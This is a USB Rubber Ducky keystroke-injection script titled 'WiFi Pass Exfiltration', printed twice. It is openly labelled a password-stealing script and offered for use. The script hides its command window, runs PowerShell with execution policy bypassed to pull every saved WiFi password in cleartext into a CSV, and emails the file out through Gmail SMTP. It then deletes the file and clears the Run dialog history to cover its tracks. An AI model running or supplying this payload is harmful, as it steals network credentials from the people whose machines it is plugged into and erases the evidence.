JonnyBanana/WiFi Pass Exfiltration

## WiFi Pass Exfiltration
REM Password Stealing script by TylerTechNZ
REM
REM --> Create Obfuscated CMD
DELAY 2000
WINDOWS r
DELAY 200
STRING cmd
ENTER
DELAY 200
STRING MODE 20,1
ENTER
DELAY 200
STRING COLOR FE
ENTER
REM --> Start Powershell, get all WiFi passwords and Export to CSV
DELAY 200
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "(netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)}  | Select-String 'Key Content\W+\:(.+)$' | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Export-Csv temp.csv"
ENTER
REM --> Wait a couple of seconds and start a new Obfuscated CMD
DELAY 3000
WINDOWS r
DELAY 200
STRING cmd
ENTER
DELAY 200
STRING MODE 20,1
ENTER
DELAY 200
STRING COLOR FE
ENTER
DELAY 200
REM --> Email CSV via GMAIL
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$SMTPInfo = New-Object Net.Mail.SmtpClient('smtp.gmail.com', 587); $SMTPInfo.EnableSsl = $true; $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('SENDEREMAIL', 'SENDERPASSWORD'); $ReportEmail = New-Object System.Net.Mail.MailMessage; $ReportEmail.From = 'SENDEREMAIL'; $ReportEmail.To.Add('RECIEVEREMAIL'); $ReportEmail.Subject = 'Wifi Report'; $ReportEmail.Body = 'Attached is your wifi report.'; $ReportEmail.Attachments.Add('temp.csv'); $SMTPInfo.Send($ReportEmail)"
ENTER
REM --> Then cover your tracks. You were never here.
DELAY 500
STRING del temp.csv
ENTER
DELAY 500
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
DELAY 500
STRING exit
ENTER
	REM Password Stealing script by TylerTechNZ
	REM
	REM --> Create Obfuscated CMD
	DELAY 2000
	WINDOWS r
	DELAY 200
	STRING cmd
	ENTER
	DELAY 200
	STRING MODE 20,1
	ENTER
	DELAY 200
	STRING COLOR FE
	ENTER
	REM --> Start Powershell, get all WiFi passwords and Export to CSV
	DELAY 200
	STRING powershell -NoP -NonI -W Hidden -Exec Bypass "(netsh wlan show profiles) \| Select-String '\:(.+)$' \| %{$name=$_.Matches.Groups[1].Value.Trim(); $_} \| %{(netsh wlan show profile name=$name key=clear)} \| Select-String 'Key Content\W+\:(.+)$' \| %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} \| %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} \| Export-Csv temp.csv"
	ENTER
	REM --> Wait a couple of seconds and start a new Obfuscated CMD
	DELAY 3000
	WINDOWS r
	DELAY 200
	STRING cmd
	ENTER
	DELAY 200
	STRING MODE 20,1
	ENTER
	DELAY 200
	STRING COLOR FE
	ENTER
	DELAY 200
	REM --> Email CSV via GMAIL
	STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$SMTPInfo = New-Object Net.Mail.SmtpClient('smtp.gmail.com', 587); $SMTPInfo.EnableSsl = $true; $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('SENDEREMAIL', 'SENDERPASSWORD'); $ReportEmail = New-Object System.Net.Mail.MailMessage; $ReportEmail.From = 'SENDEREMAIL'; $ReportEmail.To.Add('RECIEVEREMAIL'); $ReportEmail.Subject = 'Wifi Report'; $ReportEmail.Body = 'Attached is your wifi report.'; $ReportEmail.Attachments.Add('temp.csv'); $SMTPInfo.Send($ReportEmail)"
	ENTER
	REM --> Then cover your tracks. You were never here.
	DELAY 500
	STRING del temp.csv
	ENTER
	DELAY 500
	STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
	ENTER
	DELAY 500
	STRING exit
	ENTER